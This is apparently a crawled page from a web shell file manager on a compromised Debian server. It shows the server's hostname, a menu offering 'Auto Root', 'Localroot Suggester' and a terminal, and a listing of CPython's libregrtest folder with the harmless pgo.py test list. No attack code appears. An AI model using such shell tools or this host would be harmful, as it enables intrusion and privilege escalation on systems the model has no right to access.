Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3.11 /
test /
libregrtest /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2025-04-07 20:15
__init__.py
119
B
-rw-r--r--
2024-11-30 21:22
cmdline.py
19.15
KB
-rw-r--r--
2024-11-30 21:22
main.py
26.12
KB
-rw-r--r--
2024-11-30 21:22
pgo.py
1.33
KB
-rw-r--r--
2024-11-30 21:22
refleak.py
6.18
KB
-rw-r--r--
2024-11-30 21:22
runtest.py
12.87
KB
-rw-r--r--
2024-11-30 21:22
runtest_mp.py
17.6
KB
-rw-r--r--
2024-11-30 21:22
save_env.py
12.64
KB
-rw-r--r--
2024-11-30 21:22
setup.py
5.89
KB
-rw-r--r--
2024-11-30 21:22
utils.py
4.93
KB
-rw-r--r--
2024-11-30 21:22
win_utils.py
4.45
KB
-rw-r--r--
2024-11-30 21:22
Save
Rename
# Set of tests run by default if --pgo is specified. The tests below were # chosen based on the following criteria: either they exercise a commonly used # C extension module or type, or they run some relatively typical Python code. # Long running tests should be avoided because the PGO instrumented executable # runs slowly. PGO_TESTS = [ 'test_array', 'test_base64', 'test_binascii', 'test_binop', 'test_bisect', 'test_bytes', 'test_bz2', 'test_cmath', 'test_codecs', 'test_collections', 'test_complex', 'test_dataclasses', 'test_datetime', 'test_decimal', 'test_difflib', 'test_embed', 'test_float', 'test_fstring', 'test_functools', 'test_generators', 'test_hashlib', 'test_heapq', 'test_int', 'test_itertools', 'test_json', 'test_long', 'test_lzma', 'test_math', 'test_memoryview', 'test_operator', 'test_ordered_dict', 'test_patma', 'test_pickle', 'test_pprint', 'test_re', 'test_set', 'test_sqlite3', 'test_statistics', 'test_struct', 'test_tabnanny', 'test_time', 'test_unicode', 'test_xml_etree', 'test_xml_etree_c', ] def setup_pgo_tests(ns): if not ns.args and not ns.pgo_extended: # run default set of tests for PGO training ns.args = PGO_TESTS[:]